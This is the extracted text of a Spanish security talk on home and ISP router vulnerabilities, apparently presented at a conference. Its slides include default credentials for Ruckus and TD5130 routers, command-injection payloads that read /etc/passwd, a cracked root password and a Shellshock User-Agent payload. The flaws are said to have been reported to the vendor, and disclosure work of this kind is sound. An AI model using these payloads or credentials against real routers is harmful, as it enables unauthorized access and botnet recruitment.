Routers: El eslabón mas débil
2/93
Kifo/Cirin/Infiltrandome
• Auditor de seguridad
• Twitter
• Mail
•
4/93
Disclaimer
• La información, así como las técnicas y herramientas presentadas, deberán ser utilizadas con fines educativos o de investigación.
• El autor de la presentación no se responsabiliza por el uso que se de a este conocimiento.
• Por lo cual se excluye al autor de cualquier delito que sea cometido con lo comentado en esta presentación.
5/93
Conexión de casa
Router
Internet
6/93
Conexión de casa
Pringao
Router
Internet
7/93
Conexión de casa
H4x0r
Router
Internet
9/93
Usos fraudulentos
• Formar parte de una Botnet
10/93
Usos fraudulentos
• Formar parte de una Botnet
• Suplantación de DNS
11/93
Usos fraudulentos
• Formar parte de una Botnet
• Suplantación de DNS
• Putear al personal
12/93
Usos fraudulentos
• Formar parte de una Botnet
• Suplantación de DNS
• Putear al personal
• ¿Espionaje internacional?
13/93
Fallos de seguridad
Routerpwn.com
11/93
Ruckus
Usuario : superClave: sp-admin
33007 posibles victimas
SANTANDER
Ruckus
;cat /etc/passwd;cat{IFS}/etc/passwd
2/200
Ruckus
Antes:
•;cat /etc/passwd•;cat{IFS}/etc/passwd
Se reportan al fabricante los fallos.
Ahora:
•&cat{IFS}/etc/passwd
MUCHO
Ruckus
AGAIN !!!
UFF
Ruckus
Inconvenientes:
UFF
Ruckus
Inconvenientes:
•Necesitas acceso por la IP publica
UFF
Ruckus
Inconvenientes:
•Necesitas acceso por la IP publica
•Usuario y clave por defecto
CACA
Router TD5130
Usuario : adminPass: admin
ESCROTO
Router TD5130
1198
Router TD5130
debug exec cmd=“$(for p in $(ls /proc);do
for i in $(ls /proc/$p/fd); do cat /etc/passwd > /proc/
$p/fd/$i;done;done)
9/34
Router TD5130
87/34
Router TD5130
9/34
Router TD5130
9/34
Router TD5130
$1$NAxvoJ77$QJSLNH7P6drHD.mac0wpe/:0:0::/tmp/:/bin/sh
- Oye Dudux me puedes crackear una cosa?
Pásamelo y te lo miro
9/34
Router TD5130
-Tres minutos después……..
9/34
Router TD5130
Ey tío que ya lo tengo, ha salido muy rápido, no te lo vas a creer.
-Dime dime
-La clave es :
9/34
Router TD5130
Ey tío que ya lo tengo, ha salido muy rápido, no te lo vas a creer.
-Dime dime
-La clave es :
PleaseChangeMe
9/34
Router TD5130
PleaseChangeMe
9/34
Router TD5130
REMOTEMANAGEMENT : Rangos IPs publicas
9/34
Router TD5130
REMOTEMANAGEMENT : Rangos IPs publicas
9/34
Caso Hipotético
9/34
Caso Hipotético
RouterInternet
Operadora buenorra
9/34
Caso Hipotético
9/34
Caso Hipotético
RISAS
Caso Hipotético
Yeahhh tu router es mi router primohh !!
99/34
Notas finales
• No necesitas la IP publica de cada router.
99/34
Notas finales
• No necesitas la IP publica de cada router.
• Vulnerable aun cambiando las claves de acceso.
99/34
Futuro
• Modulo metasploit
• Autopwn routers
99/34
Reflexión
HTTP_USER_AGENT=() { :;}; touch /tmp/shellshock
99/34
Tarea para casa
Usuario : adminPass: admin
TCPDUMP WTF???
FIN
Agradecimientos